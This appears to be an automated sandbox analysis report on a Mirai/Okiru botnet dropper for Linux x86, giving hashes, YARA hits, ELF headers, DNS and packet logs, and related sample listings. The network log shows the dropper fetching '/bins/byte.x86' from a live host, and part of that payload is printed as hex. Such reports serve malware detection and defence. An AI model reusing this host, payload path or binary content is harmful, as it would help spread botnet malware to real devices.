                                    vbtgsze.r-e.krbyte.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.216.19.138
                                    byte.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.216.19.138
                                    byte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.216.19.138
                                    byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.216.19.138
                                    byte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.216.19.138
                                    byte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.216.19.138
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    DDOSING-BGP-NETWORKUSbyte.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.213.190.246
                                    byte.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.213.190.246
                                    llklllklld.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.213.190.246
                                    87.120.127.227-arm-2024-12-25T12_37_29.elfGet hashmaliciousUnknownBrowse
                                    • 154.213.187.125
                                    jackmymips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 154.213.186.115
                                    jackmyi686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 154.213.186.115
                                    jackmyarmv5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 154.213.186.115
                                    jackmypowerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 154.213.186.115
                                    jackmysparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 154.213.186.115
                                    jackmyarmv6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 154.213.186.115
                                    CANONICAL-ASGBbyte.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 91.189.91.42
                                    byte.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 91.189.91.42
                                    llklllklld.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 91.189.91.42
                                    .i.elfGet hashmaliciousUnknownBrowse
                                    • 91.189.91.42
                                    sh4.elfGet hashmaliciousMiraiBrowse
                                    • 91.189.91.42
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 185.125.190.26
                                    Space.spc.elfGet hashmaliciousMiraiBrowse
                                    • 91.189.91.42
                                    Space.arm5.elfGet hashmaliciousUnknownBrowse
                                    • 91.189.91.42
                                    Space.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 91.189.91.42
                                    Space.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 91.189.91.42
                                    No context
                                    No context
                                    Process:/tmp/drp.x86.elf
                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                    Category:dropped
                                    Size (bytes):75088
                                    Entropy (8bit):6.608849551891724
                                    Encrypted:false
                                    SSDEEP:1536:6SYXBbpKbF+5AQZKOtRDXVFx4bgMj+B3bEKoui0QOo/Y0TB3:SbobF+5QOth3+bgMj+xbyuPXopt3
                                    MD5:F7EEF7A952B17AB75B3BB24D03FBCDF2
                                    SHA1:83BF20A36A93B73C1F78FF224459A797DE605FA5
                                    SHA-256:9928C99EC2EF2EEE7DF7C786DBC35F5B765E9701DE45E194AB59123BDF535983
                                    SHA-512:889239C925D90300423AA621777259F4D621FB232F5765B321A851E1815D1A54CC33B2535B2AB9662F08B3D8A8DDB6464A44F7F3CE3CDA55A15A122B2611D2F1
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
                                    • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
                                    • Rule: Linux_Trojan_Mirai_fa3ad9d0, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_b14f4c5d, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_93fc3657, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_804f8e7c, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_99d78950, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_a68e498c, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_88de437f, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_ae9d0fa6, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_389ee3e9, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_cc93863b, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Linux_Trojan_Mirai_8aa7b5d3, Description: unknown, Source: /tmp/byte, Author: unknown
                                    • Rule: Mirai_Botnet_Malware, Description: Detects Mirai Botnet Malware, Source: /tmp/byte, Author: Florian Roth
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Reputation:low
                                    Preview:.ELF....................d...4....#......4. ...(..........................................................3..........Q.td............................U..S........'...h.......[]..$............U.....=.....t..5................u.......t....h.......................&....U..............Z..&....t.Rj.h....h......~............t........t....h............1.^....PTRhVj..h....QVh...................UWVS..l-....$.-....$.-....$.-.........D$...j.j.SR.*....D$0j.j.SV.+2.... ..D$ ..t.....D$,P.a.........~...l-..[^_].......~......PPh....U......D$,.............L$..D$4...........L$0.G.........T$4......|$0..$.-....R.4.F..G.PP.D$(P......P........~..w*.^..{..f......f...1.N.....f......f....G..{...........T$...$.L$...........).)...w7.$..j.....jH....Y[j.jH.#...^ZP.G.P.g.....$H....;.......\$4.....C.\$49l$4.......D$...$@,....$.,......T$..L$..D$....j..... ....D$8..1..|$ ...|$.......~.t$.1..D$$.....T<...X...<..."...<...{...<... ....F.............,...F.;D$$~..t&.@.D$$G.....9........F.<
                                    File type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
                                    Entropy (8bit):7.734464321569436
                                    TrID:
                                    • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                    • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                    File name:drp.x86.elf
                                    File size:13'068 bytes
                                    MD5:5c579391a0e733c2b406988b784dbca6
                                    SHA1:b3467d67e48111344b1f052ca85b89d4b4013734
                                    SHA256:412dcf842dc88b904d6c6900e9f2ca6f8ebe396d78cf5d5aec8e45a091e80cbf
                                    SHA512:6e69104cbb693197b297bce9f96ad21a5a4452a171c5b20ff9d2ffa8eab0c18939aaa4545128ae49035dbb7f65c2db5ddd3a69cad17e62ecef8e239008318bbf
                                    SSDEEP:384:M7bawLQ+iRAnOiWLBgk7OgvDrlFm2Fc7IUGj5IgF:8Gf1AOi6BZ7/Drl3q7IBFI+
                                    TLSH:5042BFD65BE7563FC0A18B7A2A3F5821B045F1206B8F3F4E2E477E4660A2005E7378E4
                                    File Content Preview:.ELF....................`...4...........4. ...(.....................L2..L2..............................8;..........Q.td...............................+UPX!........hF..hF......`........?d..ELF.......)...m...4.xE.. .(.....~m..-.#..C..sc.................x'.

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, little endian
                                    Version:1 (current)
                                    Machine:Intel 80386
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:UNIX - Linux
                                    ABI Version:0
                                    Entry Point Address:0x804a960
                                    Flags:0x0
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:3
                                    Section Header Offset:0
                                    Section Header Size:40
                                    Number of Section Headers:0
                                    Header String Table Index:0
                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                    LOAD0x00x80480000x80480000x324c0x324c7.74290x5R E0x1000
                                    LOAD0x00x804c0000x804c0000x00x3b380.00000x6RW 0x1000
                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 27, 2024 13:26:50.630201101 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:50.749918938 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:50.750014067 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:50.750893116 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:50.870699883 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994407892 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994513035 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994640112 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994652987 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994664907 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994683027 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994683027 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994700909 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994776964 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994787931 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994800091 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994812012 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.994817019 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994817019 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994853020 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.994853020 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.995018959 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.995032072 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:51.995062113 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:51.995062113 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.114320040 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.114361048 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.114443064 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.114476919 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.186762094 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.186805964 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.186871052 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.186908960 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.190917015 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.190957069 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.191024065 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.191060066 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.197551966 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.197635889 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.197690964 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.205956936 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.206068993 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.207031012 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.214349985 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.214466095 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.214596987 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.222780943 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.222850084 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.223788023 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.231189013 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.231287956 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.233171940 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.239727020 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.239780903 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.240463972 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.247989893 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.248065948 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.248987913 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.256400108 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.256516933 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.258228064 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.264014959 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.264123917 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.265588045 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.378601074 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.378707886 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.379008055 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.381160021 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.381252050 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.382498026 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.386177063 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.386269093 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.388073921 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.391241074 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.391345978 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.391710043 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.396364927 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.396481991 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.397211075 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.401067972 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.401181936 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.402761936 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.405842066 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.406023026 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.406835079 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.410657883 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.410761118 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.412290096 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.415640116 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.415652990 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.415906906 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.420283079 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.420392036 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.421360016 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.423156977 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.425056934 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.425149918 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.426759958 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.429902077 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.430002928 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.430327892 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.434709072 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.434840918 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.435863972 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.498553038 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.498619080 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.500983953 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.511394024 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.511406898 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.511461020 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:52.523061991 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:26:52.564743042 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:53.534224987 CET5370480192.168.2.14154.213.190.246
                                    Dec 27, 2024 13:26:53.654280901 CET8053704154.213.190.246192.168.2.14
                                    Dec 27, 2024 13:27:01.556411028 CET46540443192.168.2.14185.125.190.26
                                    Dec 27, 2024 13:27:32.019265890 CET46540443192.168.2.14185.125.190.26
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 27, 2024 13:26:49.848772049 CET4060153192.168.2.141.1.1.1
                                    Dec 27, 2024 13:26:50.628582954 CET53406011.1.1.1192.168.2.14
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 27, 2024 13:26:49.848772049 CET192.168.2.141.1.1.10x4d62Standard query (0)vbtgsze.r-e.krA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 27, 2024 13:26:50.628582954 CET1.1.1.1192.168.2.140x4d62No error (0)vbtgsze.r-e.kr154.213.190.246A (IP address)IN (0x0001)false
                                    Session IDSource IPSource PortDestination IPDestination Port
                                    0192.168.2.1453704154.213.190.24680
                                    TimestampBytes transferredDirectionData
                                    Dec 27, 2024 13:26:50.750893116 CET45OUTGET /bins/byte.x86 HTTP/1.0
                                    Data Raw: 00 62
                                    Data Ascii: b
                                    Dec 27, 2024 13:26:51.994407892 CET711INHTTP/1.0 200 OK
                                    Accept-Ranges: bytes
                                    Content-Length: 75088
                                    Content-Type: application/octet-stream
                                    Last-Modified: Fri, 27 Dec 2024 12:09:56 GMT
                                    Date: Fri, 27 Dec 2024 12:26:51 GMT
                                    Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 64 81 04 08 34 00 00 00 c0 23 01 00 00 00 00 00 34 00 20 00 03 00 28 00 0a 00 09 00 01 00 00 00 00 00 00 00 00 80 04 08 00 80 04 08 9c 17 01 00 9c 17 01 00 05 00 00 00 00 10 00 00 01 00 00 00 a0 17 01 00 a0 a7 05 08 a0 a7 05 08 e0 0b 00 00 e0 33 00 00 06 00 00 00 00 10 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 55 89 e5 53 e8 13 00 00 00 81 c3 17 27 01 00 e8 68 00 00 00 e8 83 e9 00 00 5b 5d c3 8b 1c 24 c3 90 90 90 90 90 90 90 90 90 90 90 90 55 89 e5 83 ec 08 80 3d 80 b3 05 08 00 74 0c eb 35 83 c0 04 a3 c4 a7 05 08 ff d2 a1 c4 a7 05 08 8b 10 85 d2 75 eb b8 00 00 00 00 85 c0 74 10 83 ec 0c 68 9c 97 05 08 e8 04 7f fb f7 83 c4 10 c6 05 80 b3 05 08 01 c9 c3 90 8d b4 26 00 00 00 00 55 b8 00 00 00 00 89 e5 83 ec 08 e8 00 00 00 00 5a 81 c2 94 26 01 00 85 c0 74 15 52 6a 00 68 84 b3 05 08 68 9c 97 05 08 e8 c3 7e fb f7 83 c4 10 a1 b0 a7 05 08 85 c0 74 16 b8 00 00 00 00 85 c0 74 0d [TRUNCATED]
                                    Data Ascii: ELFd4#4 (3QtdUS'h[]$U=t5uth&UZ&tRjhh~tth1^PTRhVjhQVhUWVSl-$-$-$-D$jjSR*.D$0jjSV+2 D$ tD$,Pa~l-[^_
                                    Dec 27, 2024 13:26:51.994640112 CET1236INData Raw: 5d c3 89 dd 81 fb f4 01 00 00 7e 05 bd f4 01 00 00 50 50 68 9c 02 00 00 55 e8 1b c1 00 00 89 44 24 2c 89 c7 83 c4 10 85 ed 0f 8e 02 01 00 00 8a 4c 24 1b c7 44 24 34 00 00 00 00 81 e1 ff 00 00 00 89 4c 24 30 c6 47 04 00 c7 07 ff ff ff ff 8b 54 24
                                    Data Ascii: ]~PPhUD$,L$D$4L$0GT$4|$0$-R4FGPPD$(PP~w*^{ff1NffG{T$$L$))w7$jjHY
                                    Dec 27, 2024 13:26:51.994652987 CET1236INData Raw: 00 8d 44 24 4b 50 e8 0d 90 00 00 5b 8d 54 24 4b 52 e8 72 8f 00 00 5a 59 68 80 6a 05 08 8d 4c 24 4b 8d 04 01 50 e8 7e 8f 00 00 5b 8d 44 24 4b 50 e8 53 8f 00 00 5a 59 6a 10 8d 54 24 4b 8d 04 02 50 e8 c2 77 00 00 5b 8d 4c 24 4b 51 e8 37 8f 00 00 5a
                                    Data Ascii: D$KP[T$KRrZYhjL$KP~[D$KPSZYjT$KPw[L$KQ7ZYhjT$KPC[L$KQZVYRT$KP%[L$KQZYhjT$KP[L$KQZYRT$KPXL$KQY[hjT$KP$9XZjj
                                    Dec 27, 2024 13:26:51.994664907 CET1236INData Raw: 83 c4 20 0b 84 24 58 2d 00 00 75 28 8b 0b c6 43 04 04 e9 bf f9 ff ff 68 00 40 00 00 6a 03 68 b0 6a 05 08 8b 56 f0 52 e8 d1 ad 00 00 83 c4 10 e9 ea fe ff ff 83 ec 0c 8b 03 50 e8 a4 8f 00 00 83 c4 10 c7 03 ff ff ff ff c6 43 04 00 e9 a0 f9 ff ff 83
                                    Data Ascii: $X-u(Ch@jhjVRPCjIzY[jjI*z^ZPGPn$IBzjJzY[jjJy^ZPGP9$JzjK{zY[jjKy^ZPGP$Ky
                                    Dec 27, 2024 13:26:51.994776964 CET1236INData Raw: 00 00 e8 71 76 00 00 c7 04 24 41 00 00 00 e8 65 76 00 00 c7 04 24 42 00 00 00 e8 59 76 00 00 c7 04 24 43 00 00 00 e8 4d 76 00 00 c7 04 24 44 00 00 00 e8 41 76 00 00 c7 04 24 45 00 00 00 e8 35 76 00 00 c7 04 24 46 00 00 00 e8 29 76 00 00 c7 04 24
                                    Data Ascii: qv$Aev$BYv$CMv$DAv$E5v$F)v$Gv_XhDt$|VuD$@\$p)1L$XF|$X$QR<T$$GFQQD$HPRJ/t,D$0PPD$,P
                                    Dec 27, 2024 13:26:51.994787931 CET1236INData Raw: 81 00 00 5b 8d 8c 24 90 28 00 00 51 e8 1f 81 00 00 5a 8d 57 14 59 52 8d 94 24 90 28 00 00 8d 04 02 50 e8 29 81 00 00 5b 8d 8c 24 90 28 00 00 51 e8 fb 80 00 00 5a 59 68 a7 6a 05 08 8d 94 24 90 28 00 00 8d 04 02 50 e8 04 81 00 00 5b 8d 8c 24 90 28
                                    Data Ascii: [$(QZWYR$(P)[$(QZYhj$(P[$(QZYR$(PX$(QY[hj$(P$9qXZjj9QpX$(QqZYS$(P~$9RpX$(QDY[hj
                                    Dec 27, 2024 13:26:51.994800091 CET1236INData Raw: fa ff ff 29 d8 83 f8 1e 0f 87 ad f8 ff ff 8b 86 60 fa ff ff 89 c2 83 e0 1f c1 ea 05 0f ab 84 94 84 50 00 00 8b 86 60 fa ff ff 39 44 24 48 0f 8d aa f8 ff ff e9 07 fa ff ff 8b 44 24 48 85 c0 0f 84 fc f7 ff ff c7 84 24 98 51 00 00 00 00 00 00 c7 84
                                    Data Ascii: )`P`9D$HD$H$Q$Q$QPj$PR$QQD$dPj$D$D$,D$\aQt"T$\X<<#<T$,D
                                    Dec 27, 2024 13:26:51.994812012 CET1236INData Raw: 3c 7a 00 00 83 c4 10 89 c3 80 bc 04 83 00 00 00 20 0f 94 c0 8d b4 24 83 00 00 00 25 ff 00 00 00 6a 02 68 c6 6a 05 08 01 c3 8b 44 24 70 29 d8 01 de 50 56 e8 18 78 00 00 83 c4 10 89 c2 83 f8 ff 74 2d 83 f8 01 7e 03 83 ea 02 8d 84 24 a8 51 00 00 01
                                    Data Ascii: <z $%jhjD$p)PVxt-~$QPPjV;xL$lA1PPjj@f$Pl$pUSy@T$\zPPjj@fPD$pPSzyT$| M|$h,)j)hjWU
                                    Dec 27, 2024 13:26:51.995018959 CET1236INData Raw: 50 6a 00 6a 3d e8 9e 62 00 00 6a 0b 50 8b 4c 24 74 8b 81 94 02 00 00 50 56 e8 6a 73 00 00 83 c4 20 40 0f 84 03 ff ff ff 50 50 6a 00 6a 3d e8 75 62 00 00 6a 0b 50 8b 44 24 74 8b 80 94 02 00 00 50 56 e8 41 73 00 00 83 c4 20 6a 01 68 da 6a 05 08 8b
                                    Data Ascii: Pjj=bjPL$tPVjs @PPjj=ubjPD$tPVAs jhjT$d<)PWsL$\\$8CD$\xlT$\BXjhjPVr@jhjD$dSVrT$\BjhjPVr
                                    Dec 27, 2024 13:26:51.995032072 CET1236INData Raw: e9 90 f2 ff ff c7 03 68 00 00 00 e9 ea fc ff ff 83 3f 0b 0f 85 35 f3 ff ff e9 77 f2 ff ff c7 84 24 a4 51 00 00 07 00 00 00 80 7e 04 73 0f 84 b3 01 00 00 8b 84 24 a4 51 00 00 52 29 c3 8d 04 06 53 50 56 e8 02 8d 00 00 c7 84 24 b4 51 00 00 00 00 00
                                    Data Ascii: h?5w$Q~s$QR)SPV$Qt+</@/0$QuVm~&VpmPPVD$XPvm$Q@P>m=\$LWWhS
                                    Dec 27, 2024 13:26:52.114320040 CET1236INData Raw: 50 e8 c2 59 00 00 5b 5f 6a 00 6a 50 e8 07 59 00 00 5a 59 50 8d 46 14 50 e8 4b 69 00 00 c7 04 24 50 00 00 00 e8 1f 59 00 00 83 c4 10 e9 72 ff ff ff 83 ec 0c 6a 4c e8 8d 59 00 00 5b 5f 6a 00 6a 4c e8 d2 58 00 00 5a 59 50 8d 46 14 50 e8 16 69 00 00
                                    Data Ascii: PY[_jjPYZYPFPKi$PYrjLY[_jjLXZYPFPi$LX=jMXY[_jjMXZYPFPh$MXjN#Y[_jjNhXZYPFPh$NXjOX[_jjO3XZYPFPwh


                                    System Behavior

                                    Start time (UTC):12:26:49
                                    Start date (UTC):27/12/2024
                                    Path:/tmp/drp.x86.elf
                                    Arguments:/tmp/drp.x86.elf
                                    File size:13068 bytes
                                    MD5 hash:5c579391a0e733c2b406988b784dbca6